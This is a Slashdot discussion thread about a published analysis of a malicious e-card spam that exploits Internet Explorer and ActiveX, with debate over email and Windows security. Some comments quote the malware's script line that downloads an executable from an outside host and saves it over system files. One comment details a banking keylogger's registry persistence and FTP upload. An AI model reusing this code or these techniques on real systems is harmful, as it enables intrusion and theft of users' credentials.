Malicious E-Cards - An Analysis of Spam 482
smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."
I hate ecards (Score:5, Insightful)
Does anyone else think that our society is overdue on becoming fed up with all these sort of things?
---
Mod me down, I'm already -1...woot!
Turn off HTML viewing in your email client! (Score:5, Insightful)
It's an easy way to protect yourself from all sorts of stupid stuff.
Ahem, turn off HTML viewing in your email client NOW.
Re:Turn off HTML viewing in your email client! (Score:4, Informative)
Support shareware :-)
Re:Turn off HTML viewing in your email client! (Score:5, Informative)
spam filter:
"viagra", +9
"herbal", +6
"natural", +6
"to be removed", +5
"free", +2
"!!!", +2
You get the point. You can toggle things like loading external graphics etc. It is really a mail client for power users. Shareware, but one of the few programs I ever purchased.
Re:Turn off HTML viewing in your email client! (Score:5, Informative)
Where to start.. I finally ditched the Bat! after my five years last week.. and good riddance.
The UI has not evolved, sure lots of new features get added over the years, but they all end up as hacks into an already clumsy interface.
The UI is a classic case of a few -really- good features (I do appreciate them) surrounded by poo. Auto-formating in the text is useless, NEVER paste some code and try to annotate it, turning it off leaves everything else looking ugly. Even Outlook manages to format it's messages better.
The UI displays a classic 'designed by the developers' illness. They can't see it's flaws because they're too embedded in the development. If they'd just employ a professional UI designer to re-jig it, and actually do the things suggested, then it would be a world-beater.
And you now have to upgrade ($$$) to the latest version to stay current. It's just the same as the old one, hardly any worthwhile new features. A money-spinning enforced upgrade of the most cynical sort.
If you want it's fantastic filtering systems, wonderful templates, clever widgets, superb PGP support etc.. and are prepared to put a lot of effort and patience into learning and using it, then I heartily recommend it.
If all you want to do is write emails to people, and read ones you receive, save yourself time and money by looking elsewhere.
Re:Turn off HTML viewing in your email client! (Score:5, Funny)
What next? Should I stop using Outlook???
Re:Turn off HTML viewing in your email client! (Score:5, Informative)
See http://support.microsoft.com/default.aspx?scid=kb
Re:Turn off HTML viewing in your email client! (Score:4, Informative)
Nice Spin, MS (Score:5, Funny)
Was the (Cough) "new feature" originally only intended for internal use (where they know how really risky using their own products can be), or is Regedit going to replace menus in future versions of Windows?
Re:Turn off HTML viewing in your email client! (Score:4, Interesting)
Erik
Re:Turn off HTML viewing in your email client! (Score:5, Insightful)
Ok, but that doesn't require html; MIME can do this fine. In fact it's better since the image is part of the message,
Re:Turn off HTML viewing in your email client! (Score:5, Insightful)
The point is, attaching pictures to email has absolutely nothing to do with HTML. "Non-technical end-users" don't compose HTML that references pictures because it requires having a Web server to serve the pictures. All you are really going to get out of HTML in an email is varied fonts and colors. As neat as that might be, it is hardly enhanced communication. Nor is it worth the risks.
95% of the HTML email I get is spam. The other 5% is messages from mailing list subscriptions or Amazon or whatever. Most of those come with both plain text and HTML. If nothing else, most "nontechnical end-users" would do good to turn off HTML so they won't have to look at offensive porn spam with obscene images (not attachments).
-matthew
Re:Turn off HTML viewing in your email client! (Score:4, Insightful)
Because, in the case I case I was describing, tech support, having the image integrated into the message -- like saying "click [picture of button]" instead of "click the button that looks like Bugs Bunny on speed" or whatever is a lot more helpful?
A LOT of damn good reasons. It is indeed supposed to be a <i>good</i> thing.
Erik
Re:Turn off HTML viewing in your email client! (Score:3, Informative)
And pasting a screen shot into a word processing document, then attaching that is not OK? Yes, a little more work, but the benefit is safer Internet use for the rest of us.
Email is Email. HTML is for Web pages. The marriage of the two (Thanks Bill!) makes SPAM more dangerous, lets the email sender track you (via 1x1 images), and makes email messages MUCH larger thereby wasting bandwidth.
OR (Score:5, Interesting)
Re:OR (Score:5, Insightful)
Otherwise known as a white list.
Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.
And this is the real bad effect that SPAM has created. We no longer trust strangers.
Sigh...
Re:OR (Score:4, Insightful)
Realworld example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).
And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".
Crap, now I gotta go find another story to spend my mod points on
Keep HTML ditch activex (Score:5, Informative)
There's a reason why this stuff is written with activex controls - they look official like they're from the operating system. Disable activex and watch the spyware go away. It seems most people know not to download an
Re:Turn off HTML viewing in your email client! (Score:5, Funny)
I misread that as "turn off HTML viewing in your web browser NOW", and wondered why it wasn't marked as funny...
Well, it would make some things safer...
Re:I hate ecards (Score:5, Insightful)
Perhaps you should. Most windows users are somewhat prepared for things like this because it's become a matter of routine. (sick as that is).
But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.
Re:Yes , indeed! (Score:4, Insightful)
I am not an expert in these things, so I won't bother to try to figure out how they can be done. I do know that much is possible. As an example, when I first left the BBS's and got on the internet I received an email warning me about an email going around that would wipe your hard drive clean if you opened it. I passed it on to my step-father, an engineer for the Navy working on a NASA base. He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible. Do you agree with them today? 100 years ago most experts would have told you that landing on the moon was not possible. Nor was breaking the sound barrier. Please don't limit your imagination. I can assure you that the sick fscks out there aren't so limited.
Look beyond things transmitted by email. Every day people find flaws in your favorite operating systems including ways to gain root access and do as they please. And every day someone is fixing that kind of problem. Every day we learn something new which often requires us to change software and change the way we run it to improve security.
You sound very confident that you are secure, that it can't happen to you. I think you have a false sense of security. If you and your system were perfect, totally secure and immune to tampering by someone from the outside....well, you would have solved the problem for everyone. You'll be in high demand.
Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?
Frightening (Score:5, Insightful)
Re:Frightening (Score:5, Insightful)
Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.
Re:Frightening (Score:5, Insightful)
I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.
But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.
I'm quite sure... (Score:5, Insightful)
But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.
Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.
It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.
They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.
But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.
So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.
Kjella
Amazing, really (Score:5, Insightful)
And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.
Re:Frightening (Score:4, Informative)
Wow, are you trolling or what? First of all, as of this writing, shift-clicking on a link in FireFox (formerly Firebird) does open it in a new window, although god knows why you'd want to do that when you can middle-click to open it in a tab in the background instead.
Secondly, the "stupid dinosaur splash screen" (which I loved) has been gone for about 4 release versions of Mozilla now, to be replaced with a hideously drab orange box with 'Mozilla' written in it. Now that we've compromised on an ugly splash screen, no one's happy. Hooray for attempting to pander to everyone!
You might remember me (Score:5, Funny)
Re:You might remember me (Score:5, Interesting)
Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?
Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?
Virus vs. Spam (Score:5, Interesting)
MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!
E-mail just can't beat those times.
Spam in Outlook (Score:5, Interesting)
Re:Spam in Outlook (Score:5, Insightful)
Re:Spam in Outlook (Score:5, Insightful)
Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.
The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.
Remember "security through obscurity"? Well, the reverse applies, too.
Re:Spam in Outlook (Score:5, Informative)
And, IMHO, is only partly correct.
Windows and it's apps have many "by design" security flaws.
Short list:
- Horrible data-binding in many apps (IE/Outlook/etc)
- Enabling scripts in emails to run in the local zone
- No warnings for insecure passwords
- NetBIOS open by default for the internet
- IIS, period
- Null sessions
- Password hashing flaw (l0pth)
Some of these are fixed, some are not.
Apache runs on the majority of servers, and it isn't by far hacked as much... just figure.
Re:Spam in Outlook (Score:3, Insightful)
Re:Spam in Outlook (Score:3, Insightful)
Of course, it could be pointed out that this is true for any piece of software.
It's sort of a truism-- if a cracker is aware of an exploit that the OSS community does not know about, then your linux/BSD bo
The most frightening bit here (Score:5, Interesting)
Don't run ActiveX as Administrator, simple. (Score:4, Informative)
Assuming that, and that your WinLusers are running current versions of Windows with actual security, and they're running as regular users, a web page CAN'T overwrite anything because regular users don't have write permissions in %systemroot% or in Program Files.
Problem solved. Without a script blocker or any other third-party garbage.
Re:Don't run ActiveX as Administrator, simple. (Score:4, Insightful)
Re:Don't run ActiveX as Administrator, simple. (Score:5, Insightful)
Re:Don't run ActiveX as Administrator, simple. (Score:4, Informative)
"Security" in Windows is just broken, it's that simple.
Re:Don't run ActiveX as Administrator, simple. (Score:4, Insightful)
My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.
Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.
for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.
Re:Don't run ActiveX as Administrator, simple. (Score:3, Informative)
Not true. Support was extended two years.
Re:The most frightening bit here (Score:5, Informative)
Re:The most frightening bit here (Score:4, Insightful)
"/Dread"
Re:The most frightening bit here (Score:5, Informative)
Re:The most frightening bit here (Score:5, Interesting)
(MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla
One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape
Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.
Re:The most frightening bit here (Score:3, Insightful)
Re:The most frightening bit here (Score:5, Interesting)
Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.
If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.
Re:The most frightening bit here (Score:3, Informative)
Re:The most frightening bit here (Score:3, Informative)
I'm forced to use IE at work with the "prompt before accepting activeX components" option turned on. You think pop-ups are bad, you should try this! It seems to be used for any kind of plugin (flash, etc), and most pages with adverts, even slashdot, contain activeX of some kind. It really highlights how dangerous IE is - even when you're prompted, you don't know what you're accepting - you could be trying to view a PDF file - and if you accept it y
Re:The most frightening bit here (Score:4, Informative)
Windows Update depends on ActiveX to determine which updates a user already has. Many virus-scanning websites need to be able to read and (and when cleaning, write to) every file on the system, so they need ActiveX too.
When it comes down to it, ActiveX controls are just as powerful as any other executable, which is why the user is presented with a security certificate before they run. I think the critical flaw in ActiveX is right there at that dialog box, because the default answer is "Yes" and users don't read the whole thing to understand what it means.
Re:The most frightening bit here (Score:4, Insightful)
Like, I think it's a File Replace dialog, "Yes" / "Yes to All" / "No" / "Cancel"
Why is there "No to All"? It's not quite as useful as "Yes to All", but you could easily think of some scenarios where you want to add in new files but don't want to try and overwrite any files that are already there...
Re:The most frightening bit here (Score:5, Interesting)
No it wouldn't be redundant, different behaviors are impled, since it's not "No to ALL files I selected to copy", it's "no to all files with a name collision"
I'm thinking of copying a bunch of files (say, W, X, Y, and Z) into a directory that already has some files with the same name. (say, X and Z)
W copies fine.
X brings up that dialog:
"Yes"--copy X, copy Y, ask about Z
"Yes to all"--copy X, copy Y, copy Z
"No"--skip X, copy Y, ask about Z
"No to all"--skip X, copy Y, skip Z
"Cancel"--skip X, skip Y, skip Z
Now, this is obviously a trivial example, but if you have a large number of files, where you want all the files that were in the source directory but don't want any existing file in the destination directory changed, the assymetry in the dialog is annoying.
Spylog is not spyware! (Score:5, Informative)
Just a minor correction.
A little bit unfair to Outlook (Score:4, Interesting)
Re:A little bit unfair to Outlook (Score:5, Informative)
At what point (Score:5, Insightful)
If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.
It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).
People actually get pissed off when we tell them they can't have weatherbug on their computer.
Are there really better alternatives??? (Score:4, Insightful)
Not trolling, just asking an honest question here.
Re:Are there really better alternatives??? (Score:3, Interesting)
So, in effect, yes, there is an aspect to the other clients that is inherently more sec
Re:Are there really better alternatives??? (Score:5, Insightful)
Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.
I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.
Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.
Still, having be written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.
Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.
Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.
Security through obscurity DOES work (Score:4, Insightful)
Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazzaa returns 0 results. Security through obscurity worked in this example.
Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, Whitehouse, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.
I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.
Re:Security through obscurity DOES work (Score:4, Interesting)
However, in software you can't have that near 100% obscurity because large numbers of people have to use the software. Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis, the security would eventually break down. The floor plan would eventually be at least partially elucidated and this could allow further security breaches, leading to the discovery of more of the floor plan, etc.
The whole point of making software (like this) is so that lots of people will use it routinely. This high volume, routine use does eventually lead to a breach in the security of the software.
I agree that the flat, absolute statement "security through obscurity never works" is incorrect. However, that pure obscurity is exceptionally rare, alomst to the point of nonexsistence in the software world.
Re:Are there really better alternatives??? (Score:5, Interesting)
Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.
No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!
Go to web-site, get a new OS!
And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?
To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".
Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.
I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.
I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.
Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.
I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.
What the hell?
Conclusions (Score:5, Insightful)
1. Clicking can be dangerous.
2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.
Stay on your toes (Score:5, Insightful)
I hate spam (Score:5, Insightful)
- spam is cheap to produce
- a sucker is born every day
- even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
- spam filters are not installed on all mail servers
- spam is CHEAP to produce (again)
Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.
How can email on the internet remain free/cheap and still not allow spam to run rampant?
noHTML for Outlook Express (Score:5, Informative)
Quote from that article:
Conclusion
If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.
Or alternatively,
you can use an HTML disabler like noHTML for Outlook Express [baxbex.com]
Ugly is what ugly does (Score:5, Insightful)
x.Open("GET", "http://adversting.co.uk/a.exe",0);
and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea
Launching Files (Score:3, Insightful)
That was the point of a "home page", you could get your news and start up Word all on the same page.
Re:Ugly is what ugly does (Score:4, Informative)
Actually, that bit of code just downloads the malicious .EXE. It's a bit dodgy that it's allowed to do it automatically (after all, it could be asking for http://spy.malware.com/cgi-bin/report?firstname=Jo hn&lastname=Doe&underwear_type=boxers...), but it's not an instant security breach itself. The actual bug is...
...which overwrites Media Player with the downloaded malware using ADODB.Stream (which probably never should have been enabled as a trusted ActiveX control in the first place, and certainly shouldn't be automatically overwriting files without user intervention).
Re:Ugly is what ugly does (Score:5, Interesting)
There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?
There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.
Redndant, I know. Don't run as Administrator. (Score:3, Interesting)
Then the evil e-cards can't overwrite wmplayer.exe or anythingelse.exe because regular users don't have write access to the Windows directory or the Program Files directory, where they're stored.
The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root. Everyone here keeps missing the underlying problem because of their anti-M$ bias. Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.
Re:Redndant, I know. Don't run as Administrator. (Score:5, Informative)
Tell you what sparky -- YOU try that across a enterprise type installation. Actually there is ONE (1) remaining application running across any of my networks that requires Windows (2K) boxes to remain until something else is phased in: AUTOCAD.
Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user. I'd love to see you get AEC content networked and working on a local machine as a regular user. Good luck.
Fortunately the engineering types are special. They've got TWO computers now. 90% of their work is done on CAD which is Windows right now -- the other 10% they tap the Mac for services (file processing, email, web, word, whatever).
Every other sub-system requiring Windows has been replaced (for us -- started in 2000) and I have to agree with you 100% otherwise: regular users have no reason to run anything as administrator or "root". Just can't do that in the Windows world...
Re:Redndant, I know. Don't run as Administrator. (Score:3, Informative)
That being said, having IE download and run executables remains risky even if you are not admin: a trojan/backdoor can just as easily run from your home directory or your own "Startup Items" folder.
the intrepid attacker can then run all manner of other exploits/social engineering once he has a local irc zombie. Of course, the sa
Re:Redndant, I know. Don't run as Administrator. (Score:3)
True, good point.
Everyone here keeps missing the underlying problem because of their anti-M$ bias.
True as well. However, it does contribute very much that windos very much encourages this unsafe behaviour, while all Linux and *BSD systems I know go to great pains to discourage it.
Re:Redndant, I know. Don't run as Administrator. (Score:3, Insightful)
Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.
Wheee!
Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.
Re:Redndant, I know. Don't run as Administrator. (Score:4, Insightful)
Except:
a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.
b) thanks to the wonder of modern miraculous setuid technology, there's no log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.
c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.
Those are just three reasons why most people run as Administrator on Windows and don't on Linux.
Re:Redndant, I know. Don't run as Administrator. (Score:4, Insightful)
x.Open("GET", "http://adversting.co.uk/a.exe",0);
s.SaveToFile
etc...
This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but thats not an excuse for IE's pisspoor security.
German dialer spam gangs used "e-cards", too. (Score:5, Interesting)
Using Mozilla on Windows won't protect you ... (Score:5, Interesting)
I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.
My solution: I renamed wscript.exe and cscript.exe so they can't execute.
Re:Using Mozilla on Windows won't protect you ... (Score:4, Informative)
If you use Outlook for your mail.. (Score:5, Informative)
Go check it out. It's really, really, good, and free, as in, well, um, beer?
I have spent too many hours building elaborate rule sets, banning Class A IP's, keyword filters, etcetera. The spam still gets through and it carries nasty payload half the time. Bayesian...bayesian... bayesian...
I got one yesterday (Score:4, Interesting)
I get those stupid e-cards from relatives occasionally, and I never open the messages in anything but pine because they're usually loaded with crap I don't want to run.
In this case, I viewed the email in pine, copied the ecard number and viewed the stupid thing on the web site, presuming it would be from my brother (an AOL lifer), since it was my anniversary. It was unattributed on the site, so I figured it was just a spam/traffic generator.
overwrites wmplayer.exe?? (Score:5, Funny)
E-cards are EVIL (Score:5, Insightful)
They are spam harvesters. Nothing more.
I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.
Do I need to attach a note to my emails?
What possesses people to do it?
Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...
Bastards.
Re:E-cards are EVIL (Score:4, Insightful)
What possesses people to do it?
Because they think that it is exactly the same as sending you a physical card, just updated for the 21 centry. They have absolutly no idea that there can be a down-side to these things because they are thinking of it in terms of a physical card. They are probably thinking that since you use a computer a lot, then you will like to see a greeting card on your computer. I know, I have a lot of relatives that have done this in the past, and it took a lot of explaning to them why this was a really bad idea.
My spam with full header database (Score:5, Informative)
I have been putting my spam with full headers here, [quicktopic.com] and hope that people investigating can use the info in the headers like IP addresses, gateways, aliases etc. As it is cached in Google so the results should show up for specific keywords.
If you are spam hunters, please be my guest and fry some spammers a***
.
Oh boy... (Score:3, Funny)
"Malicious E-Cards" - An anal...
I thought goatse was coming back... in the form of email.
*Shudder*
patching (Score:4, Insightful)
Check out Qwik-Fix. (Score:5, Informative)
After trying it on my workstation for a couple of weeks, I've started deploying it to others. It seems to interfere with Norton Antivirus, though not McAffee (which is what UMBC machines should be using anyway).
I also send out the desktops with Mozilla, Media Player Classic, RealAlternative, etc. If people want IM, I try to recommend GAIM. Open source apps tend to have been "written in a more paranoid age" as another poster put it, and also can't as easily get away with doing dumb crap. I also remove the IE and Outlook shortcuts from the desktop (but leave the IE shortcut in the start menu, because the eternally pending PeopleSoft requires it).
Spy.htm: honey pot potential (Score:4, Interesting)
Payload (Score:5, Informative)
This decompresses and drops 'ra32.exe', 'lanext.dll' and 'lanman.dll' into the Application Data\Microsoft folder, and sets ra32.exe to run on startup through a HKCU\Software\MS\Win\CV\Run registry entry.
These files act as a keylogger. When they sees one of a built-in list of online bank sites being used, it logs keypresses for a bit and uploads the result via FTP to a server controlled by the attacker.
Bizarrely, for me in Windows 2000, it also opens an alert box with the message 'timediff' every 60 seconds. Bug?
Re:e-cards (Score:3, Insightful)
Re:e-cards (Score:4, Interesting)
---
Mod me down...I'm already -1....woot!
Re:e-cards (Score:3, Informative)
The less moral ones sell the email addresses they hervest from every ecard- both sender and destination.
To prove this, get 2 fresh email addresses. send an ecard from one to the other. Watch the spam roll in.
Re:e-cards (Score:5, Interesting)
With regards to the article, thats definitly one of the nastiest browser exploits i've seen in a long time, makes me glad I don't use windows and IE.
Re:It'd be scary if I ran my PC as Administrator.. (Score:5, Interesting)
Re:It'd be scary if I ran my PC as Administrator.. (Score:5, Funny)
Re:Russian spyware. (Score:5, Funny)
CB